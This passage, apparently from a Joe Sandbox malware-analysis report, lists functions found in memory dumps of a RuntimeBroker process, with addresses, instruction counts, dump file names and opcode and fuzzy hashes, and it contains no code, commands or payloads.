                                                                                    • Opcode ID: b32c651c7235a8ba7ff19824b40471a64066826e37a020ca0b6ca0571fcca6c8
                                                                                    • Instruction ID: c74b7c826accf1a1e135716a2edfbc988ced41af3271bd54738915de1d26286e
                                                                                    • Opcode Fuzzy Hash: b32c651c7235a8ba7ff19824b40471a64066826e37a020ca0b6ca0571fcca6c8
                                                                                    • Instruction Fuzzy Hash: 60015B34B1D5068FE31C8708849177973D5FB86704F70423DD54BC628ADA3CB9426D55
                                                                                    Function 00007FFD343E0C40 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aa88565d334715e60adce184a27fcc1296be9004259e452469743d690529a750
                                                                                    • Instruction ID: 9b26fb760e8ece7771a2b95fe5cc28d312cacfc8ae7bc242b13dd73dc54dd2f1
                                                                                    • Opcode Fuzzy Hash: aa88565d334715e60adce184a27fcc1296be9004259e452469743d690529a750
                                                                                    • Instruction Fuzzy Hash: BF016136A0E7988FE702EB6898A41DE7FB0EF43314F1945E6C680DB192D53856899781
                                                                                    Function 00007FFD343E5EF1 Relevance: .0, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ad2d5dfb5c16a610bad244d69bcc03052962ac035d5815781a7d058aa8efec79
                                                                                    • Instruction ID: fe96c8fc097785a950fe6c19bcb675f5063115ce9d80eaccddae1558944e8ce1
                                                                                    • Opcode Fuzzy Hash: ad2d5dfb5c16a610bad244d69bcc03052962ac035d5815781a7d058aa8efec79
                                                                                    • Instruction Fuzzy Hash: 44012522E5D92D4AEBA4B75884B57BA6190AF46300F5401B5D90DE32D2DD3C6D816740
                                                                                    Function 00007FFD347D14BB Relevance: .0, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f2f3ebd9f8bb8f71b768571a6bcede2e6f85233d046bf5cce07648781cbca48b
                                                                                    • Instruction ID: 9ae5b5c09b0a6f52e9872d559389bd1c043008667c5c0023fb0213eb66c568cc
                                                                                    • Opcode Fuzzy Hash: f2f3ebd9f8bb8f71b768571a6bcede2e6f85233d046bf5cce07648781cbca48b
                                                                                    • Instruction Fuzzy Hash: DF01E87190895C8FCF98EB58C8A4BE877B4EB99315F1401AAD40DE7291DA35AAC5CB80
                                                                                    Function 00007FFD347D7D80 Relevance: .0, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a854abd170012c4be46b62017c2fd2bbbfee7c092fb3d6b3799fcadb98572f4b
                                                                                    • Instruction ID: 8a14d041f78da8356232ef54f41838234caa6c875b0f08a44350a97c69d3e620
                                                                                    • Opcode Fuzzy Hash: a854abd170012c4be46b62017c2fd2bbbfee7c092fb3d6b3799fcadb98572f4b
                                                                                    • Instruction Fuzzy Hash: BD017D3130D2868FC706CB28D9B16E57B80EF43314F1406BED945CB2C2C659A515C7C0
                                                                                    Function 00007FFD347D14BA Relevance: .0, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bbca5fb98b1b08883692abd2903c8e5a4fc101091b78e50d8de322db2f1e8400
                                                                                    • Instruction ID: 40f492f163122d7c5c87bd42ca6ee3fde3e91e8445b6b546fe267d5bf2a448f8
                                                                                    • Opcode Fuzzy Hash: bbca5fb98b1b08883692abd2903c8e5a4fc101091b78e50d8de322db2f1e8400
                                                                                    • Instruction Fuzzy Hash: 1301EC7190895CCFCF98EF58C8A4BE877B0EB59315F1401A9D40DE7291DA35AAC5CB80
                                                                                    Function 00007FFD343E171D Relevance: .0, Instructions: 40COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 61904a8d67c1a144fbc8af5c398f45c147b78ed9ee95dec9934e2cf91871fac4
                                                                                    • Instruction ID: 5167e7d99683a8dd349c3c1fdba04ff9f8800a0c6c039a92384512e376f11267
                                                                                    • Opcode Fuzzy Hash: 61904a8d67c1a144fbc8af5c398f45c147b78ed9ee95dec9934e2cf91871fac4
                                                                                    • Instruction Fuzzy Hash: 8EF0C823F4D41A4BEB54F648C4A56FD7391EB90710F094676D40EC72D5DE2CAD8293C0
                                                                                    Function 00007FFD343E5F11 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction ID: db96a83b2404d05d4156c18e8f9d65d10326253ad1d7700575b52856a397d9af
                                                                                    • Opcode Fuzzy Hash: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction Fuzzy Hash: 21016D31A9D51E8AEBA4BA44D8A5BF973A0EF15300F5400B9D90ED31A2EE3C2DC25A41
                                                                                    Function 00007FFD343E0C48 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e29c50fa9d688aa280f0ed051006b6d5c8c81f1ea4558d6d1634d8a88d54206b
                                                                                    • Instruction ID: 734d2c5e21db0d8c14baac1b955bb65203b8da64f1ccef26ce2d9e41e6ff3127
                                                                                    • Opcode Fuzzy Hash: e29c50fa9d688aa280f0ed051006b6d5c8c81f1ea4558d6d1634d8a88d54206b
                                                                                    • Instruction Fuzzy Hash: FB019E32A0E3888FD702EB68C8941DEBFB0EF03314F1945EAC180DB292D5385A88C781
                                                                                    Function 00007FFD347D1532 Relevance: .0, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 48a2293e31f07e81d6644c326eabd9ed17423f6c475c5dd6dcfd0d20221c4be1
                                                                                    • Instruction ID: 4b9945470c2d17cf450a0b0a321dce52d4cfac2b76c4b6df7a764a00e2690e64
                                                                                    • Opcode Fuzzy Hash: 48a2293e31f07e81d6644c326eabd9ed17423f6c475c5dd6dcfd0d20221c4be1
                                                                                    • Instruction Fuzzy Hash: 6EF0967185E3C5AFD7029B7088625E57FB8EF43314F1500F6E086C70A2C56C661AD762
                                                                                    Function 00007FFD347D721F Relevance: .0, Instructions: 37COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6f2808f1064981b03ee5d6d6762b9bb85ad75f336e9899f397a69f247890601b
                                                                                    • Instruction ID: e8627ccce8d21ebbe654f98d6dd79159bd015539f090f22bc7bb5a7a148d0485
                                                                                    • Opcode Fuzzy Hash: 6f2808f1064981b03ee5d6d6762b9bb85ad75f336e9899f397a69f247890601b
                                                                                    • Instruction Fuzzy Hash: 77F0E972B09E9C8FD755D95844552EDB7E1FF9A300F04063BD54EE7281CE68780957C1
                                                                                    Function 00007FFD343F42CD Relevance: .0, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343f0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ec201fbe1e43aba32797752d7a2903c086bb9a06b76eee36951d30661a2fb99f
                                                                                    • Instruction ID: 59287e685f18a436c266831516c5fb5da4a28fa878bd067b978e0e4f4a7b465f
                                                                                    • Opcode Fuzzy Hash: ec201fbe1e43aba32797752d7a2903c086bb9a06b76eee36951d30661a2fb99f
                                                                                    • Instruction Fuzzy Hash: 4DF03172F4851E8BEB58EA48D8A58BD73A1FF65311B00063AC51AD7394DF7869019740
                                                                                    Function 00007FFD347D10D7 Relevance: .0, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ef2cf5b5bfd51d6e5e718420f7da6b1775b840cbc5386533d02587769c5c0238
                                                                                    • Instruction ID: 1c0654b7abe67dd6543ddf69ff7d380e07d7d53c8e9893cad2613f78eec2e8af
                                                                                    • Opcode Fuzzy Hash: ef2cf5b5bfd51d6e5e718420f7da6b1775b840cbc5386533d02587769c5c0238
                                                                                    • Instruction Fuzzy Hash: 7D01B6B0A1885DCFCB99FF48C4A1BA8B7F1FB59700F1401A9D10EE3291CA35A981DF90
                                                                                    Function 00007FFD343E0C50 Relevance: .0, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 063bab0e2a4b436208131f171173a2f94cc48cc607a8cef7041587e6a3d050be
                                                                                    • Instruction ID: 04d2dfb04c82a57575cbe4a77b6c7bbfcfc77b03587cd4fd9ee23f37aab8fc9f
                                                                                    • Opcode Fuzzy Hash: 063bab0e2a4b436208131f171173a2f94cc48cc607a8cef7041587e6a3d050be
                                                                                    • Instruction Fuzzy Hash: A601A231A0E3888FE712EB7484941DEBFF0EF07304F1845E6C580DB292D9385A88C741
                                                                                    Function 00007FFD347D2D08 Relevance: .0, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a90974b8b5ed1f7bb618ed271b43469fb67a758d86f9b73ed6b04c68363c0ada
                                                                                    • Instruction ID: c67d2cb53225999a0988733fa1fb0cdc652bdabec83a2348f8ef862300558061
                                                                                    • Opcode Fuzzy Hash: a90974b8b5ed1f7bb618ed271b43469fb67a758d86f9b73ed6b04c68363c0ada
                                                                                    • Instruction Fuzzy Hash: BAF0BEA4B2F54ACAF72A8A20A4B52F97A01AF03300F34053ACA4FC34D2CA1D710B73D1
                                                                                    Function 00007FFD34909A69 Relevance: .0, Instructions: 32COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3537780170.00007FFD34900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34900000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34900000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 35b59306492b06861c7c3b656fabe86d527c0c4b44fb6d7dc8f521f4666b1e0c
                                                                                    • Instruction ID: 825780abf128024ef6fdb87f8ef9c233c63d5439708aeb4052d55e9e52ab1386
                                                                                    • Opcode Fuzzy Hash: 35b59306492b06861c7c3b656fabe86d527c0c4b44fb6d7dc8f521f4666b1e0c
                                                                                    • Instruction Fuzzy Hash: 80F05E307085058FE318DA08C8A07A67396FBD5311F708239D14AC36EADA3CFD429A80
                                                                                    Function 00007FFD347D749C Relevance: .0, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3ce0c18526d642e50efbd4f3c4ff3d2ea2e3a8c6d4374ff27d6b42098e3da21e
                                                                                    • Instruction ID: de609fef09af6081bc02418966e1594812dbd48253b1a2cf3ea515647ad0ecdb
                                                                                    • Opcode Fuzzy Hash: 3ce0c18526d642e50efbd4f3c4ff3d2ea2e3a8c6d4374ff27d6b42098e3da21e
                                                                                    • Instruction Fuzzy Hash: 59F0A0D2B2A98646E7BA652C10B62F93680EF93340B48007AE24DDB2D6DC0C780662C1
                                                                                    Function 00007FFD347D25FB Relevance: .0, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ab63e53c6cd9056922887595f37dc1d8f3c3462fc2cc341c9cc5fe4247973e21
                                                                                    • Instruction ID: 4257d56ad522f9b28695d7807f61d3c1d718cafc22643a468bb9d13dc464f8a5
                                                                                    • Opcode Fuzzy Hash: ab63e53c6cd9056922887595f37dc1d8f3c3462fc2cc341c9cc5fe4247973e21
                                                                                    • Instruction Fuzzy Hash: FEE06D51F3EA07DAF76920281DF107C21829F87650F240535DB0BC6AC9EC4C795B32D2
                                                                                    Function 00007FFD343F5518 Relevance: .0, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343f0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5fb093ff02a71e26105fccf7503ed6f1ae4011e19121ff59a0269e74ada4076c
                                                                                    • Instruction ID: fc2ab7d9bf95787595b1c91682d8ddb825d25d9d90c73509376798f757b15e4e
                                                                                    • Opcode Fuzzy Hash: 5fb093ff02a71e26105fccf7503ed6f1ae4011e19121ff59a0269e74ada4076c
                                                                                    • Instruction Fuzzy Hash: 92D05E30B6090D4B8B4CA62D8458430F3D1E7AA6067945278D44BC3285ED29ECC6CB80
                                                                                    Function 00007FFD343E4265 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction ID: 5e955548f11ab2433f2e569a67abea519a43871091a6218b221e418b01c7639a
                                                                                    • Opcode Fuzzy Hash: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction Fuzzy Hash: E5E01232F4911A86FB98B548C8E13EA6264EF45304F180078DB5ED33C1DD3CAEC09605
                                                                                    Function 00007FFD343F5A01 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343f0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4b53b216302019b691b53068446fe4c351e9a901c622123c4aff91fe1b924c7e
                                                                                    • Instruction ID: 81fcc9d12416cf7c9a750116ba6875d7221e505fb91360ef9b4a881c011d4281
                                                                                    • Opcode Fuzzy Hash: 4b53b216302019b691b53068446fe4c351e9a901c622123c4aff91fe1b924c7e
                                                                                    • Instruction Fuzzy Hash: 0BE0CD20A1E6410FC709777C58655B43BD0DF57215F9544FAD049CB1B3D95DD848C342
                                                                                    Function 00007FFD343F3E00 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343f0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                    • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                    Function 00007FFD343F5568 Relevance: .0, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343f0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 967185c70a2bc06f9d71807151e92370ab4e9ade6a36d5020ca375d73c1663c1
                                                                                    • Instruction ID: be3a019fae2af0df484b2722ce36aa720d58d5e54151f8e41193f9e9c0141b11
                                                                                    • Opcode Fuzzy Hash: 967185c70a2bc06f9d71807151e92370ab4e9ade6a36d5020ca375d73c1663c1
                                                                                    • Instruction Fuzzy Hash: BDD0C930B609084F8B4CE72C889D97072D1EB6A21679540A9D40AC72A5E96AD899DB41
                                                                                    Function 00007FFD347D2227 Relevance: .0, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b419b68e175a82473d99e072050c443c16a8dca3b425e8859935c11117325595
                                                                                    • Instruction ID: 6347a708894a44ffb2b815d0fb0bf0d108a2fe096c0c44ace1f3fd308616531b
                                                                                    • Opcode Fuzzy Hash: b419b68e175a82473d99e072050c443c16a8dca3b425e8859935c11117325595
                                                                                    • Instruction Fuzzy Hash: DDD05B91F1F385CBE716057408B21742A509F7B34071606FAE64AC92D7D95D390B6362
                                                                                    Function 00007FFD347DBBAE Relevance: .0, Instructions: 17COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 91ae1e51c880a1e76fedeb9b3411013d12e1d07fcaa016c2bed6651261395508
                                                                                    • Instruction ID: cccfdf718e224e0c762bae1e1b727789a4f6f5b6b8376da978649535b9fb5df9
                                                                                    • Opcode Fuzzy Hash: 91ae1e51c880a1e76fedeb9b3411013d12e1d07fcaa016c2bed6651261395508
                                                                                    • Instruction Fuzzy Hash: D9D05E91B2E4468AE7A8E66805B237475D6EF8A740F1400B9E54EC72C7CE1E7C4862C6
                                                                                    Function 00007FFD343F4BD7 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343f0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 18652c7a7e1e5c6faaa405073d46f2ae8ec14b86f43d5acdc76515fa78c7179a
                                                                                    • Instruction ID: 30467b28f6ab174d6e10ce265b78421e0221f6634e2660cae8327e017053eeee
                                                                                    • Opcode Fuzzy Hash: 18652c7a7e1e5c6faaa405073d46f2ae8ec14b86f43d5acdc76515fa78c7179a
                                                                                    • Instruction Fuzzy Hash: 86D01722B9C91B4AF645FA089CE0A7A22A1AF75300F100074D64EC3186CE3CA812A601
                                                                                    Function 00007FFD347DBB9E Relevance: .0, Instructions: 14COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 94bbcbc19efe6719c6c0cc383f2d4d89a3dd7de3906a77fcb19be742caa07891
                                                                                    • Instruction ID: eeb122c0f6ffdf705574cb6baffaf9a2d952b0ec2078a000793c0ec60faff8c0
                                                                                    • Opcode Fuzzy Hash: 94bbcbc19efe6719c6c0cc383f2d4d89a3dd7de3906a77fcb19be742caa07891
                                                                                    • Instruction Fuzzy Hash: 27D0A73010D445CFD7C5DB14C194C2133A0EF1A3403250090E10BC71B1CA28ED05EBA0
                                                                                    Function 00007FFD343E06AD Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction ID: d8a034d3eadd56306136040cc71971a4a2c566673f2357e922dbad6dd1579167
                                                                                    • Opcode Fuzzy Hash: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction Fuzzy Hash: 3EC08C03FCB56B80B841316E24E20EFA1208BC6320FDC0032D30CD20919C3D20C62156
                                                                                    Function 00007FFD343E12D8 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction ID: 4b764aa09d87ae252aaea70fa7dbb2e1cf0f5a670bde5e25e0268d4432d86b4d
                                                                                    • Opcode Fuzzy Hash: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction Fuzzy Hash: EFC08C305518098FC948FB28C88480433A0FB0A210BC60090E009C7270D229DCC0D740
                                                                                    Function 00007FFD347D7D5B Relevance: .0, Instructions: 11COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f104c97747dfa0be6682d7cafb803721c77a285653e36eaee2bb5089e45fd32e
